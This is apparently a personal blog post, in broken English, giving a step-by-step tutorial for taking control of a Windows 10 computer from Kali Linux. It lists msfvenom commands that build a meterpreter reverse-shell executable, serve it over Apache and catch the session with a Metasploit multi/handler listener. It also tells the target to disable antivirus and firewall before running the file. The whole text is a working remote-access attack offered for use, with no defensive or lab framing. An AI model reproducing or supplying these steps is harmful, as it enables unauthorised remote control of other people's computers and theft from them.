Exploiting Windows10 Using Kali



Hi! Everyone  I am here to  you how to hack PC or Laptop. First you need to install Kali-Linux in your 

PC windows system. Then install virtual machine and it's extension pack . Put the Kali-Linux 

in the virtual machine and set the network bridge adapter of kali linux in virtual machine.

Then you have to start your kali linux . You have to Check your PC and Kali-Linux connected

to wi-fi.

Here Our Hacking Is Start -

1. Start your kali linux and type following command in your kali linux. Here you have to type 

    what seytem type of your PC instead of /x64/

          msfvenom-p windows/x64/meterpreter/reverse_tcp lhost=<your IP address> lport=8080 -f .exe > /var/www/html/hacker.exe


2. Then you see  hacker.exe file was created in your kali's file manager

3. Then type following commands

         service apache2 start

         msfconsole

         


         msfdb init

        

4. Type following commands and after executing last  command don't close the terminal window
         use exploit/multi/handler

         set payload windows/x64/meterpreter/reverse_tcp

         set lhost  <your IP address>

         set lport  8080

         exploit

       



5. Now your hacker.exe file move from kali to windows. Then download hacker.exe file from 

    Google Chrome download for file type <your IP address>/hacker.exe in search bar in chrome.

    Before downloading that file make sure that your antivirus scan and firewall scan was turned off.

     After turning off antivirus and firewall scan download it and run it.


6. After run that file you will see that the kali got the session and meterpreter of hacked system



7. Now You control the windows system then you know about commands and its use you have to

    type "help" command 


8. Than you are in that system and you can handle it.
                             Thank you for visiting my blog 

                         I wish to it will help for you !!!



Comments

Popular Posts